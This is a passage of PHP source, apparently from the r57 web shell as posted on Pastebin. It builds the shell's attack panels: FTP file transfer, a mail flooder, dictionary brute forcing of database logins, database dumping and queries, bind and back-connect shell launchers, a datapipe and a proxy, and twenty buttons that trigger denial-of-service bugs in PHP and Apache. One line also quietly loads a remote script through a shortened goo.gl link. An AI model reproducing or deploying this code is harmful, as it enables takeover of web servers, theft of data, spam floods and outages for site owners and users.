echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));

6863
6864
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

6865
6866
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";

6867
6868
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));

6869
6870
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));

6871
6872
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));

6873
6874
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));

6875
6876
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));

6877
6878
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));

6879
6880
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));

6881
6882
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

6883
6884
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";

6885
6886
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));

6887
6888
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));

6889
6890
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));

6891
6892
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));

6893
6894
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));

6895
6896
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));

6897
6898
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));

6899
6900
echo $te."</td>".$fe."</tr></div></table>";

6901
6902
}

6903
6904
if(@function_exists("mail")){

6905
6906
echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;

6907
6908
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";

6909
6910
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));

6911
6912
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));

6913
6914
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));

6915
6916
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');

6917
6918
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

6919
6920
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

6921
6922
echo "<SCRIPT SRC=http://goo.gl/ZibW9L></SCRIPT> <font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";

6923
6924
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));

6925
6926
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));

6927
6928
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));

6929
6930
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));

6931
6932
echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);

6933
6934
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

6935
6936
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

6937
6938
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";

6939
6940
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));

6941
6942
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));

6943
6944
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));

6945
6946
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');

6947
6948
echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));

6949
6950
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

6951
6952
echo $te."</td>".$fe."</tr></div></table>";

6953
6954
}

6955
6956
if($mysql_on||$mssql_on||$pg_on||$ora_on)

6957
6958
{

6959
6960
$select = '<select name=db>';

6961
6962
if($mysql_on) $select .= '<option>MySQL</option>';

6963
6964
if($mssql_on) $select .= '<option>MSSQL</option>';

6965
6966
if($pg_on)    $select .= '<option>PostgreSQL</option>';

6967
6968
if($ora_on)   $select .= '<option>Oracle</option>';

6969
6970
$select .= '</select>';

6971
6972
echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;

6973
6974
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";

6975
6976
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));

6977
6978
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));

6979
6980
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));

6981
6982
echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");

6983
6984
echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);

6985
6986
echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);

6987
6988
echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));

6989
6990
echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));

6991
6992
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));

6993
6994
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

6995
6996
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";

6997
6998
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);

6999
7000
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));

7001
7002
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));

7003
7004
echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));

7005
7006
echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));

7007
7008
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));

7009
7010
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

7011
7012
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";

7013
7014
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);

7015
7016
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));

7017
7018
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));

7019
7020
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));

7021
7022
echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");

7023
7024
echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";

7025
7026
echo "</td>".$fe."</tr></div></table>";

7027
7028
}

7029
7030
if(!$safe_mode &&$unix){

7031
7032
echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;

7033
7034
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";

7035
7036
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));

7037
7038
echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));

7039
7040
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));

7041
7042
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));

7043
7044
echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;

7045
7046
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";

7047
7048
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ?(getenv('REMOTE_ADDR')) : ("127.0.0.1"))));

7049
7050
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));

7051
7052
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));

7053
7054
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));

7055
7056
echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;

7057
7058
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";

7059
7060
echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));

7061
7062
echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));

7063
7064
echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));

7065
7066
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));

7067
7068
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));

7069
7070
echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;

7071
7072
echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";

7073
7074
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));

7075
7076
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));

7077
7078
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));

7079
7080
echo $te."</td>".$fe."</tr></div></table>";

7081
7082
}

7083
7084
echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=50%>".$ts;

7085
7086
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";

7087
7088
echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);

7089
7090
echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit exhaustion in [ pack() ] function').$fe);

7091
7092
echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF in [ unserialize() ] function').$fe);

7093
7094
echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'Limit integer calculate (65535) in ZendEngine').$fe);

7095
7096
echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [ dl() ] vulnerability').$fe);

7097
7098
echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)').$fe);

7099
7100
echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)').$fe);

7101
7102
echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);

7103
7104
echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)').$fe);

7105
7106
echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)').$fe);

7107
7108
echo $te."</td><td valign=top width=50%>".$ts;

7109
7110
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";

7111
7112
echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)').$fe);

7113
7114
echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)').$fe);

7115
7116
echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)').$fe);

7117
7118
echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF in [ str_ireplace() ] function (PHP <5.2.x)').$fe);

7119
7120
echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)').$fe);

7121
7122
echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)').$fe);

7123
7124
echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)').$fe);

7125
7126
echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)').$fe);

7127
7128
echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)').$fe);

7129
7130
echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)').$fe);

7131
7132
echo $te."</td></tr></div></table>";

7133
7134
?>
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!